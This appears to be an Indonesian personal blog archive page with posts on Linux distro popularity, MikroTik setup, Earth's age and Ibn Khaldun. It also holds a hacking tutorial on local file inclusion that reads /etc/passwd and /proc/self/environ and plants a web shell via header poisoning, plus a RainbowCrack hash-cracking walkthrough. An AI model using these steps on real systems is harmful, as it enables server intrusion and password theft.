Tulesan Biasa

Kesuksesan adalah kemampuan anda mengatasi kegagalan tanpa kehilangan semangat untuk mencapai kesuksesan

Selasa, 27 Juli 2010

Perkembangan Distro Linux di Dunia



Berdasarkan data Google Insights, diketahui bahwa Indonesia merupakan salah satu dari lima negara yang memiliki distro Linux terbesar di dunia.

Blog Pingdom Royal melansir, Jumat (22/8/2008), terdapat delapan distro Linux yang masuk ke dalam survei tersebut, meliputi Ubuntu, OpenSUSE, Fedora, Debian, Red Hat, Mandriva, Slackware, dan Gentoo.

Untuk mengetahui popularitas masing-masing distro, tim survei mengambil sampling di tiap-tiap negara dengan memanfaatkan fitur Google Insight for Search dari masing-masing regional untuk mendapatkan data spesifik. Google menyebut fiturnya ini dengan regional interest.

Mekanismenya, jika diketahui proporsi Linux di sebuah negara cukup besar, maka tim akan mencari tahu indikasinya yang menjadikan proporsi tersebut besar, apakah karena proporsi distro Ubuntu yang besar, atau Red Hat, atau distro lainnya.

Di level global, ditemukan minat Linux terbesar berasal dari India, Kuba, Rusia, disusul Republik Ceko, Indonesia, dan Bangladesh yang berada di satu regional dengan Indonesia.

Sedangkan negara Barat pertama yang memiliki minat Linux terbesar berasal dari Jerman, yang secara global bertengger di peringkat ke-sepuluh.

Di Amerika Serikat, minat terbesar muncul secara signifikan dari Utah dan California. Namun, dilaporkan California memiliki proporsi lebih sedikit dibandingkan Utah.



Hasil survei tersebut, dengan delapan distro meliputi Ubuntu, OpenSUSE, Fedora, Debian, Red Hat, Mandriva, Slackware, dan Gentoo, ditemukan data sebagai berikut:
- Ubuntu merupakan distro paling populer di Itali dan Kuba.
- OpenSUSE merupakan distro paling populer di Rusia dan Republik Ceko.
- Red Hat merupakan distro terbesar di Bangladesh dan Nepal.
- Debian merupakan distro terbesar di Kuba.
- Rusia dan Republik Ceko merupakan dua dari lima negara yang mendistribusi Linux
terbesar dengan lima distro.
- Indonesia merupakan salah satu dari lima negara yang mendistribusi Linux terbesar
dengan empat distro.
- Kuba merupakan salah satu dari lima negara yang mendistribusi Linux terbesar
dengan tiga distro.
- Amerika Serikat tidak termasuk dalam lima negara yang mendistribusi Linux terbesar.


Ubuntu



Map Ubuntu Global
Berikut ini lima negara yang memiliki distro Ubuntu terbesar di dunia:
1. Itali
2. Kuba
3. Indonesia
4. Norwegia
5. Republik Ceko


OpenSUSE



Map openSUSE Global
Berikut ini lima negara yang memiliki distro OpenSUSE terbesar di dunia:
1. Rusia
2. Republik Ceko
3. Moldova
4. Jerman
5. Indonesia


Fedora



Map Fedora Global
Berikut ini lima negara yang memiliki distro Fedora terbesar di dunia:
1. Sri Lanka
2. Bangladesh
3. India
4. Nepal
5. Zimbabwe


Debian



Map Debian Global
Berikut ini lima negara yang memiliki distro Debian terbesar di dunia:
1. Kuba
2. Republik Ceko
3. Jerman
4. Belarus
5. Rusia


Red Hat



Map Red Hat Global
Berikut ini lima negara yang memiliki distro Red Hat terbesar di dunia:
1. Bangladesh
2. Nepal
3. Sri Lanka
4. India
5. Kuba


Mandriva



Map Mandriva Global
Berikut ini lima negara yang memiliki distro Mandriva terbesar di dunia:
1. Rusia
2. Republik Ceko
3. Polandia
4. Perancis
5. Indonesia


Slackware



Map Slackware Global
Berikut ini lima negara yang memiliki distro Slackware terbesar di dunia:
1. Bulgaria
2. Indonesia
3. Brazil
4. Rusia
5. Polandia


Gentoo



Map Gentoo Global
Berikut ini lima negara yang memiliki distro Gentoo terbesar di dunia:
1. Rusia
2. Republik Ceko
3. Belarus
4. Moldova
5. Estonia


Dari data di atas, dapat disimpulkan popularitas Linux di negara bagian Timur lebih besar dibandingkan negara bagian Barat, dengan pengecualian di negara tertentu, Kuba.

Kesimpulan tersebut tidak terlalu mengejutkan, menimbang negara-negara yang memakai piranti lunak gratis tersebut sebagian besar adalah negara dengan pendapatan per kapita yang relatif lebih rendah dibandingkan negara-negara Barat.

Namun, data di atas juga mengindikasikan popularitas piranti lunak berlisensi, seperti Windows, relatif lemah di negara-negara Timur.
semoga bermanfaat gan...

Label:

Sabtu, 24 Juli 2010

Setting Router Mikrotik OS

Langkah-langkah berikut adalah dasar-dasar setup mikrotik yang dikonfigurasikan untuk jaringan sederhana sebagai gateway server.
1. Langkah pertama adalah install Mikrotik RouterOS pada PC atau pasang DOM.
2. Login Pada Mikrotik Routers melalui console :
MikroTik v2.9.7
Login: admin
Password: (kosongkan)
Sampai langkah ini kita sudah bisa masuk pada mesin Mikrotik. User default adalah admin dan tanpa password, tinggal ketik admin kemudian tekan tombol enter.
3. Untuk keamanan ganti password default
[admin@Mikrotik] > password
old password: *****
new password: *****
retype new password: *****
[admin@ Mikrotik]] >
4. Mengganti nama Mikrotik Router, pada langkah ini nama server akan diganti menjadi “telsa” (nama ini sih bebas2 aja mo diganti)
[admin@Mikrotik] > system identity set name=telsa
[admin@telsa] >
5. Melihat interface pada Mikrotik Router
[admin@telsa] > interface print
Flags: X - disabled, D - dynamic, R - running
# NAME TYPE RX-RATE TX-RATE MTU
0 R ether1 ether 0 0 1500
1 R ether2 ether 0 0 1500
[admin@telsa] >
6. Memberikan IP address pada interface Mikrotik.
Misalkan ether1 akan kita gunakan untuk koneksi ke Internet dengan IP 192.168.0.1 dan ether2 akan kita gunakan untuk network local kita dengan IP 172.16.0.1
[admin@telsa] > ip address add address=192.168.0.1
netmask=255.255.255.0 interface=ether1
[admin@telsa] > ip address add address=172.16.0.1
netmask=255.255.255.0 interface=ether2
7. Melihat konfigurasi IP address yang sudah kita berikan
[admin@telsa] >ip address print
Flags: X - disabled, I - invalid, D - dynamic
# ADDRESS NETWORK BROADCAST INTERFACE
0 192.168.0.1/24 192.168.0.0 192.168.0.63 ether1
1 172.16.0.1/24 172.16.0.0 172.16.0.255 ether2
[admin@telsa] >
8. Memberikan default Gateway, diasumsikan gateway untuk koneksi internet adalah 192.168.0.254
[admin@telsa] > /ip route add gateway=192.168.0.254
9. Melihat Tabel routing pada Mikrotik Routers
[admin@telsa] > ip route print
Flags: X - disabled, A - active, D - dynamic, C - connect, S - static, r - rip, b - bgp, o - ospf
# DST-ADDRESS PREFSRC G GATEWAY DISTANCE INTERFACE
0 ADC 172.16.0.0/24 172.16.0.1 ether2
1 ADC 192.168.0.0/26 192.168.0.1 ether1
2 A S 0.0.0.0/0 r 192.168.0.254 ether1
[admin@telsa] >
10. Tes Ping ke Gateway untuk memastikan konfigurasi sudah benar
[admin@telsa] > ping 192.168.0.254
192.168.0.254 64 byte ping: ttl=64 time<1 ms
192.168.0.254 64 byte ping: ttl=64 time<1 ms
2 packets transmitted, 2 packets received, 0% packet loss
round-trip min/avg/max = 0/0.0/0 ms
[admin@telsa] >
11. Setup DNS pada Mikrotik Routers
[admin@telsa] > ip dns set primary-dns=192.168.0.10 allow-remoterequests=no
[admin@telsa] > ip dns set secondary-dns=192.168.0.11 allow-remoterequests=no
12. Melihat konfigurasi DNS
[admin@telsa] > ip dns print
primary-dns: 192.168.0.10
secondary-dns: 192.168.0.11
allow-remote-requests: no
cache-size: 2048KiB
cache-max-ttl: 1w
cache-used: 16KiB
[admin@telsa] >
13. Tes untuk akses domain, misalnya dengan ping nama domain
[admin@telsa] > ping yahoo.com
216.109.112.135 64 byte ping: ttl=48 time=250 ms
10 packets transmitted, 10 packets received, 0% packet loss
round-trip min/avg/max = 571/571.0/571 ms
[admin@telsa] >
Jika sudah berhasil reply berarti seting DNS sudah benar.
14. Setup Masquerading,
Jika Mikrotik akan kita pergunakan sebagai gateway server maka agar client computer pada network dapat terkoneksi ke internet perlu kita masquerading.
[admin@telsa]> ip firewall nat add action=masquerade outinterface=
ether1 chain:srcnat
[admin@telsa] >
15. Melihat konfigurasi Masquerading
[admin@telsa]ip firewall nat print
Flags: X - disabled, I - invalid, D - dynamic
0 chain=srcnat out-interface=ether1 action=masquerade
[admin@telsa] >
Setelah langkah ini bisa dilakukan pemeriksaan untuk koneksi dari jaringan local. Dan jika berhasil berarti kita sudah berhasil melakukan instalasi Mikrotik Router sebagai Gateway server. Setelah terkoneksi dengan jaringan Mikrotik dapat dimanage menggunakan WinBox yang bisa di download dari Mikrotik.com atau dari server mikrotik kita.
Misal Ip address server mikrotik kita 192.168.0.1, via browser buka http://192.168.0.1 dan download WinBox dari situ.
Jika kita menginginkan client mendapatkan IP address secara otomatis maka perlu kita setup dhcp server pada Mikrotik. Berikut langkah-langkahnya :
1. Buat IP address pool
/ip pool add name=dhcp-pool ranges=172.16.0.10-172.16.0.20
2. Tambahkan DHCP Network dan gatewaynya yang akan didistribusikan ke client
Pada contoh ini networknya adalah 172.16.0.0/24 dan gatewaynya 172.16.0.1
/ip dhcp-server network add address=172.16.0.0/24 gateway=172.16.0.1
3. Tambahkan DHCP Server
( pada contoh ini dhcp diterapkan pada interface ether2 )
/ip dhcp-server add interface=ether2 address-pool=dhcp-pool
4. Lihat status DHCP server
[admin@telsa]> ip dhcp-server print
Flags: X - disabled, I - invalid
# NAME INTERFACE RELAY ADDRESS-POOL LEASE-TIME ADD-ARP
0 X dhcp1 ether2
Tanda X menyatakan bahwa DHCP server belum enable maka perlu dienablekan terlebih dahulu pada langkah 5.
5. Jangan Lupa dibuat enable dulu dhcp servernya
/ip dhcp-server enable 0
kemudian cek kembali dhcp-server seperti langkah 4, jika tanda X sudah tidak ada berarti sudah aktif.
6. Tes Dari client
c:\>ping www.yahoo.com
untuk bandwith controller, bisa dengan sistem simple queue ataupun bisa dengan mangle
[admin@telsa] queue simple> add name=Komputer01
interface=ether2 target-address=172.16.0.1/24 max-limit=65536/131072
[admin@telsa] queue simple> add name=Komputer02
interface=ether2 target-address=172.16.0.2/24 max-limit=65536/131072
dan seterusnya…

Selamat mencoba semoga anda berhasil.....

Label:

Senin, 12 Juli 2010

Tanam Shell via LFI dengan Metode Proc/Self/Environ

Dalam tutorial hacking kali ini saya akan coba mengimplementasikan bagaimana membuat shell pada target server lewat LFI dengan metode proc/self/environ, hal ini telah dibahas sebelumnya di website milw0rm pada paper ke 361.
Ok kita langsung saja...

1. Hal yang pertama dilakukan seperti teknik-teknik lainnya adalah kita terlebih dahulu coba temukan website yang vulnerable terhadap serangan LFI.

contoh : http://site.com/info.php?file=news.php

2. coba kita ganti "news.php" dengan "../../../".

contoh : http://site.com/info.php?file=../../../

lalu kita mendapat error, seperti berikut...

Warning: include(../../../) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99

ok sepertinya, kita mendapat kesempatan untuk memanfaatkan include ke file lain.
selanjutanya kita coba temukan /etc/passwd.

contoh : http://site.com/info.php?file=etc/passwd
Tetapi kita masih mendapat error seperti berikut :

Warning: include(/etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99

bagaimana jika kita naikan directorynya ?
mari kita coba...

contoh : http://site.com/info.php?file=../../../../../../../../../etc/passwd

Ahoi, kita berhasil mendapatkan file /etc/passwd yang terlihat seperti berikut :

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
hplip:x:103:7:HPLIP system user,,,:/var/run/hplip:/bin/false
avahi-autoipd:x:104:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
gdm:x:105:111:Gnome Display Manager:/var/lib/gdm:/bin/false
saned:x:106:113::/home/saned:/bin/false
pulse:x:107:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false
messagebus:x:108:117::/var/run/dbus:/bin/false
polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false
avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
haldaemon:x:111:120:Hardware abstraction layer,,,:/var/run/hald:/bin/false
gunslinger:x:1000:1000:gunslinger_,,,:/home/gunslinger:/bin/bash
snmp:x:112:65534::/var/lib/snmp:/bin/false
guest:x:113:124:Guest,,,:/tmp/guest-home.rRZGXM:/bin/bash
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin

3. mari kita check apakah /proc/self/environ bisa kita akses ?
sekarang, ganti "/etc/passwd" dengan "/proc/self/environ"

contoh : http://site.com/info.php?file=../../../../../../../../../proc/self/environ

Jika anda mendapatkan yang seperti ini :

DOCUMENT_ROOT=/home/gunslinger/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html,
application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif,
image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t67261b341231b94r1844ac2ad7ac
HTTP_HOST=www.site.com HTTP_REFERER=http://www.site.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15
PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665
REQUEST_METHOD= GET REQUEST_URI = /index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/gunslinger/public_html/index.php SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=gunslinger@site.com SERVER_NAME=www.site.com
SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k
PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at www.site.com Port 80

Ternyata proc/self/environ dapat kita akses !
jika anda mendapatkan halaman yang kosong (blank) /proc/self/environ tidak dapat di akses atau mungkin juga beroperating system *BSD

4. Sekarang mari kita injeksi dengann malicious kode dengan meracuni http-headernya . bagaimana kita bisa menginjeksinya? kita bisa menggunakan tamper data pada firefox addon.
dapat anda download disini : https://addons.mozilla.org/en-US/firefox/addon/966
buka tamper data di firefox lalu masukan url /proc/self/environ yang tadi "http://site.com/info.php?file=../../../../../../../../../proc/self/environ"
lalu pada user-agent isikan dengan kode berikut :

atau

lalu submit.

5. jika kita berhasil menginjeksi malicious kode berikut, maka shell akan ada di tempat seperti ini.

http://www.site.com/shell.php

Tutorial ini bukan untuk berbuat jahat yaaa.....

ini cuma untuk bahan belajar...

Sumber :http://www.ilmuwebsite.com

Label:

Usia Bumi Diperkirakan Lebih Muda

Sejumlah peneliti geologi telah menemukan cara baru dalam menentukan usia bumi yang jauh lebih akurat.

Mereka mengatakan dalam kajian dengan cara baru ini diperkirakan usia bumi sekarang 70 juta tahun lebih muda dari perkiraan sebelumnya yang menyebutkan bahwa usia bumi adalah 4,5 miliar tahun lebih.

Tim peneliti yang melakukan kajian ini mengatakan untuk menentukan usia bumi mereka membandingkan sejumlah elemen yang terdapat dalam lapisan bumi dengan meteorit yang diperkirakan usianya sama dengan sistem tata surya.

Temuan para peneliti ini telah dilaporkan dalam jurnal Nature Geosciences.

Hasil penting dari kesimpulan yang mereka dapatkan dari penelitian ini adalah proses pembentukan bumi dari unsur-unsurnya ternyata membutuhkan waktu lebih lama dari yang telah diduga sebelumnya.

Para ilmuwan mengkaji skala waktu ini dengan melihat pada seberapa lama Bumi tumbuh atau berkembang sebagai sebuah "embrio planet" dan kemudian melihat munculnya tabrakan dengan bagian lain untuk membentuk planet bumi seperti yang terjadi sekarang.

"Proses tabrakan yang terjadi menyebabkan bagian dari planet ini meleleh dan menyebabkan unsur logam terpisah ke dalam pusat bumi dan kemudian membentuk inti bumi pada planet bumi saat ini, " kata Dr John Rudge dari Universitas Cambridge yang mengepalai proses penelitian ini.

Proses pembentukan planet yang panjang kemudian menjadikan bumi seperti sekarang dengan ukuran dan bentuk geologisnya saat ini.

Waktu pembentukan

Untuk mengkaji bagaimana proses pembentukan ini para peneliti melihat pada dua "isotop"- elemen kimia di dalam lapisan bumi yang disebut 182-hafnium dan 182-tungsten.

Setelah melalui serangkaian periode yang berlangsung beberapa juta tahun , hafnium kemudian mengalami perubahan menjadi tungsten.

Kemudian tungsten bercampur dengan logam dan kemudian ketika inti bumi mengalami proses pembentukan kesemua unsur itu menjadi satu.

Proses ini kemudian meninggalkan tanda pada lapisan bumi dan kemudian dijadikan cara untuk mengetahui berapa usia bumi.

"Jika benar maka ini berarti proses pembentukan bumi membutuhkan waktu hingga 100 juta tahun," kata Dr John Rudge.

"Kita memperkirakan hal itu yang membuat kisaran usia bumi saat ini adalah 4,467 miliar tahun yang berarti lebih muda jika dibandingkan dengan perkiraan sebelumnya yang menyebutkan usia bumi adalah 4,537 miliar tahun."

Sumber : BBCIndonesia.com - detikNews

Label:

Minggu, 11 Juli 2010

Password Cracking With RainbowCrack

Password masih menjadi masalah security yang besar dari zaman firaun bisa cebokan sampai sekarang. Password adalah suatu hal yang sangat penting keberadaannya dan harus dijaga jangan sampai berpindah tangan ke orang yang tak bertanggung jawab, tapi sayangnya masih banyak yang acuh terhadap masalah credential yang menyangkut kepentingannya sendiri.

Kebanyakan orang terutama awam dalam memilih password ialah kata-kata yang mudah diingat, dengan tujuan dikemudian hari tidak akan lupa saat digunakannya password. Padahal ada hal lain yang lebih penting daripada anda kehilangan password karena anda pikun, yaitu kekuatan password. Lebih baik anda kehilangan password karena password yang kita pakai sangat rumit menggunakan karakter campuran seperti @,#,$,%,^,& atau alt karakter seperti µ, £, Æ daripada password yang anda gunakan sangat mudah untuk di-crack seperti password = rahasia dan anda menderita kerugian jikalau anda pergunakan password = rahasia untuk login di situs perbelanjaan online di internet, atau kegiatan di internet yang bersifat sensitif.

RainbowCrack merupakan password cracking tool yang sering saya gunakan selain John The Ripper , dan l0phtCrack. RainbowCrack menggunakan teknik “time-memory trade off” yang diciptakan oleh Philip Oechslin’s. Ada dua tipe serangan untuk melakukan cryptanalysis sebuah chiper teks, yang pertama brute force dan table precomputation. Dalam brute force, seorang attacker mencoba semua kemungkinan kombinasi karakter dengan hash, dan yang kedua adalah table precomputation, yaitu perhitungan dan penyimpanan enkripsi dari plaintext terpilih dan penyimpanan dari semua kemungkinan yang cocok.

RainbowCrack menggunakan metode yang kedua, yaitu table precomputation. pasangan hash dalam file table precomputation disebut juga “rainbow table” yang bisa generate sendiri atau download di situsnya. Password Cracking Menggunakan metode table precomputation memakan waktu yang sangat singkat mulai dari beberapa detik sampai beberapa menit, password-pun bisa kita nikmati selagi hangat (lah kaya kue), tapi membutuhkan waktu lama untuk mendownload “rainbow table” terlebih lagi melakukan generate sendiri “rainbow table” hampir memakan waktu 12 jam untuk panjang password 1 sampai 7 karakter alpa (ABCDEFGHIJKLMNOPQRSTUVWXYZ) menghabiskan space hardisk 610,4 MB, dan generate untuk karakter alpha-numeric (ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789) memakan waktu berhari-hari menghabiskan space 3 GB. Terserah anda, ingin generate sendiri atau download saja disitusnya, tentunya dengan waktu yang lebih singkat, apalagi dengan koneksi yang lumayan ngebut.

Dapatkan tools RainbowCrack di http://www.antsight.com/zsl/rainbowcrack/, di sini saya mendownload source versi untuk linux.

RainbowCrack membutuhkan library openssl. Lakukan kompilasi :

root@slacker:~/tools/password# unzip rainbowcrack-1.2-src.zip
Archive: rainbowcrack-1.2-src.zip
inflating: rainbowcrack-1.2-src/disclaimer.txt
creating: rainbowcrack-1.2-src/doc/
inflating: rainbowcrack-1.2-src/doc/configurations.htm
inflating: rainbowcrack-1.2-src/doc/customcharset.htm
inflating: rainbowcrack-1.2-src/doc/rcrackdemo.htm
inflating: rainbowcrack-1.2-src/doc/rcracktutorial.htm
inflating: rainbowcrack-1.2-src/readme.txt
inflating: rainbowcrack-1.2-src/readme_src.txt
creating: rainbowcrack-1.2-src/src/
inflating: rainbowcrack-1.2-src/src/ChainWalkContext.cpp
inflating: rainbowcrack-1.2-src/src/ChainWalkContext.h
inflating: rainbowcrack-1.2-src/src/ChainWalkSet.cpp
inflating: rainbowcrack-1.2-src/src/ChainWalkSet.h
inflating: rainbowcrack-1.2-src/src/charset.txt
inflating: rainbowcrack-1.2-src/src/CrackEngine.cpp
inflating: rainbowcrack-1.2-src/src/CrackEngine.h
inflating: rainbowcrack-1.2-src/src/HashAlgorithm.cpp
inflating: rainbowcrack-1.2-src/src/HashAlgorithm.h
inflating: rainbowcrack-1.2-src/src/HashRoutine.cpp
inflating: rainbowcrack-1.2-src/src/HashRoutine.h
inflating: rainbowcrack-1.2-src/src/HashSet.cpp
inflating: rainbowcrack-1.2-src/src/HashSet.h
inflating: rainbowcrack-1.2-src/src/makefile.linux
inflating: rainbowcrack-1.2-src/src/makefile.win
inflating: rainbowcrack-1.2-src/src/MemoryPool.cpp
inflating: rainbowcrack-1.2-src/src/MemoryPool.h
inflating: rainbowcrack-1.2-src/src/Public.cpp
inflating: rainbowcrack-1.2-src/src/Public.h
inflating: rainbowcrack-1.2-src/src/RainbowCrack.cpp
inflating: rainbowcrack-1.2-src/src/RainbowTableDump.cpp
inflating: rainbowcrack-1.2-src/src/RainbowTableGenerate.cpp
inflating: rainbowcrack-1.2-src/src/RainbowTableSort.cpp
inflating: rainbowcrack-1.2-src/src/random_lm_alpha#1-7.hash
inflating: rainbowcrack-1.2-src/src/random_lm_alpha#1-7.plain
inflating: rainbowcrack-1.2-src/src/random_md5_loweralpha#1-7.hash
inflating: rainbowcrack-1.2-src/src/random_md5_loweralpha#1-7.plain
inflating: rainbowcrack-1.2-src/src/random_sha1_loweralpha#1-7.hash
inflating: rainbowcrack-1.2-src/src/random_sha1_loweralpha#1-7.plain
root@slacker:~/tools/password# cd rainbowcrack-1.2-src
root@slacker:~/tools/password/rainbowcrack-1.2-src# cd src/
root@slacker:~/tools/password/rainbowcrack-1.2-src/src# make -f makefile.linux
g++ Public.cpp ChainWalkContext.cpp HashAlgorithm.cpp HashRoutine.cpp RainbowTableGenerate.cpp -lssl -O3 -o rtgen
g++ Public.cpp ChainWalkContext.cpp HashAlgorithm.cpp HashRoutine.cpp RainbowTableDump.cpp -lssl -o rtdump
g++ Public.cpp RainbowTableSort.cpp -o rtsort
g++ Public.cpp ChainWalkContext.cpp HashAlgorithm.cpp HashRoutine.cpp HashSet.cpp MemoryPool.cpp ChainWalkSet.cpp CrackEngine.cpp RainbowCrack.cpp -lssl -O3 -o rcrack
root@slacker:~/tools/password/rainbowcrack-1.2-src/src#

Download “rainbow table” di http://www.freerainbowtables.com atau kita generate sendiri dengan rtgen.

root@slacker:~/tools/password/rainbowcrack-1.2-src/src# ./rtgen md5 alpha 1 7 0 2100 8000000 all
hash routine: md5
hash length: 16
plain charset: ABCDEFGHIJKLMNOPQRSTUVWXYZ
plain charset in hex: 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a
plain length range: 1 - 7
plain charset name: alpha
plain space total: 8353082582
rainbow table index: 0
reduce offset: 0

generating…

saya lakukan generate untuk hash md5 dengan panjang 1 sampai 7 karakter dan karakter huruf besar, hash bisa anda tentukan apakah lm, atau sha1, dan untuk huruf kecil gunakan loweralpha “rtgen sha1 loweralpha 1 7 0 2100 8000000 all”. Setelah melakukan generate rainbow table yang pertama akan menghasilkan file “md5_alpha#1-7_0_2100x8000000_all.rt”, dan lanjutkan generate “rainbow table” yang kedua, ketiga, keempat, dan kelima.

root@slacker:~/tools/password/rainbowcrack-1.2-src/src# ./rtgen md5 alpha 1 7 1 2100 8000000 all
root@slacker:~/tools/password/rainbowcrack-1.2-src/src# ./rtgen md5 alpha 1 7 2 2100 8000000 all
root@slacker:~/tools/password/rainbowcrack-1.2-src/src# ./rtgen md5 alpha 1 7 3 2100 8000000 all
root@slacker:~/tools/password/rainbowcrack-1.2-src/src# ./rtgen md5 alpha 1 7 4 2100 8000000 all

Dan biarkan komputer anda bekerja, dan anda tidur saja sudah malam sampai besok malam ketemu lagi (tergantung spesifikasi cpu), dengan komputer pentium 4 2.40 Ghz ram 256 menghabiskan waktu sekitar 14 jam.

Setelah selesai generate atau mendownload “rainbow table” waktunya untuk cracking !!!..Disini saya mempunyai daftar hash dari md5 untuk di-crack.

———-hash.txt————–
2319a82f7505ab0a28cb2b01ecd83726
b6ecbac45c48a94105a88bf44a9eaf46
b9ef4402e7e15af21270a097e9ee785e
8380b51557db90ba7ff855e819b0bb2e
bb41cc662a95d37c9d02cabec44696ad

Dan saya lakukan cracking dengan menggunakan “rainbow crack” tadi dengan probabilitass keberhasilan mencapai 99,7% dengan waktu kurang dari 2 menit untuk karakter alpha 1 sampai 7 !!!.

root@slacker:/winsuckmore/rainbowcrack# ./rcrack *.rt -l hash.txt
md5_loweralpha#1-7_0_2100x8000000_all.rt:
17281024 bytes read, disk access time: 0.04 s
verifying the file...
searching for 5 hashes...
cryptanalysis time: 10.25 s
17281024 bytes read, disk access time: 0.03 s
searching for 5 hashes...
cryptanalysis time: 0.87 s
17281024 bytes read, disk access time: 0.04 s
searching for 5 hashes...
plaintext of b9ef4402e7e15af21270a097e9ee785e is bilgets
cryptanalysis time: 0.73 s
17281024 bytes read, disk access time: 0.04 s
searching for 4 hashes...
plaintext of b6ecbac45c48a94105a88bf44a9eaf46 is kampret
cryptanalysis time: 0.60 s
17281024 bytes read, disk access time: 0.04 s
searching for 3 hashes...
cryptanalysis time: 0.53 s
17281024 bytes read, disk access time: 0.05 s
searching for 3 hashes...
cryptanalysis time: 0.52 s
17281024 bytes read, disk access time: 0.06 s
searching for 3 hashes...
plaintext of 2319a82f7505ab0a28cb2b01ecd83726 is kucink
cryptanalysis time: 0.36 s
7032832 bytes read, disk access time: 0.01 s
searching for 2 hashes...
plaintext of 8380b51557db90ba7ff855e819b0bb2e is slacker
cryptanalysis time: 0.15 s

md5_loweralpha#1-7_1_2100x8000000_all.rt:
17281024 bytes read, disk access time: 0.04 s
verifying the file…
searching for 1 hash…
cryptanalysis time: 2.03 s
17281024 bytes read, disk access time: 0.05 s
searching for 1 hash…
cryptanalysis time: 0.13 s
17281024 bytes read, disk access time: 0.03 s
searching for 1 hash…
cryptanalysis time: 0.20 s
17281024 bytes read, disk access time: 0.05 s
searching for 1 hash…
cryptanalysis time: 0.18 s
17281024 bytes read, disk access time: 0.04 s
searching for 1 hash…
cryptanalysis time: 0.15 s
17281024 bytes read, disk access time: 0.05 s
searching for 1 hash…
plaintext of bb41cc662a95d37c9d02cabec44696ad is unamed
cryptanalysis time: 0.19 s

statistics
——————————————————-
plaintext found: 5 of 5 (100.00%)
total disk access time: 0.57 s
total cryptanalysis time: 16.89 s
total chain walk step: 13211106
total false alarm: 8953
total chain walk step due to false alarm: 6522788

result
——————————————————-
2319a82f7505ab0a28cb2b01ecd83726 kucink hex:6b7563696e6b
b6ecbac45c48a94105a88bf44a9eaf46 kampret hex:6b616d70726574
b9ef4402e7e15af21270a097e9ee785e bilgets hex:62696c67657473
8380b51557db90ba7ff855e819b0bb2e slacker hex:736c61636b6572
bb41cc662a95d37c9d02cabec44696ad unamed hex:756e616d6564
root@slacker:/winsuckmore/rainbowcrack#

sumber : http://logsmylife.wordpress.com/

Label:

Ibnu Khaldun

Ibn Khaldun atau nama sebenarnya Wali al-Din Abd al-Rahman bin Muhammad bin Abu Bakar Muhammad bin al-Hasan lahir di Tunis pada 1 Ramadan 732H Keluarganya berasal daripada keturunan Arab Hadramaut yang pernah menetap di Serville, Italy, dan SepanyoL Akhirnya berpindah dan menetap di Afrika Utara semasa pemerintahan Hafs Abu Zakariyya, pemerintah Tunis pada waktu itu.

Seperti yang dinyatakan sebelum ini, Ibn Khaldun mendapat pendidikan dalam pelbagai ilmu Islam seperti al-Quran, al'Hadith, perundangan Islam, kesusasteraan, falsafah, bahasa, dan mantik. Antara gurunya ialah Muhammad Ibrahim al-Abili, Abu Abd Allah al-Jayyani, Abd Allah Muhammad bin Abd al-Salam.

Ibn Khaldun menjadi cendekiawan yang agung sehingga disanjung oleh Barat kerana buah fikirannya, Walau bagaimana pun jarang umat Islam mengkajinya. Sebenarnya, sumbangan pemikiran Ibn Khaldun dalam ekonomi banyak dimuatkan dalam hasil karya agungnya, al Muqaddimah. Antara teori ekonomi yang terdapat dalam karyanya masih lagi relevan dengan masalah ekonomi semasa.

Ibn Khaldun telah membincangkan beberapa prinsip dan falsafah ekonomi seperti keadilan (al adl), hardworking, kerjasama (cooperation), kesederhanaan (moderation), dan fairness.

Berhubung dengan keadilan (Justice), Ibn Khaldun telah menekankan bahawa keadilan merupakan tulang belakang dan asas kekuatan sesebuah ekonom. Apabila keadilan tidak dapat dilaksanakan, sesebuah negara akan hancur dan musnah.

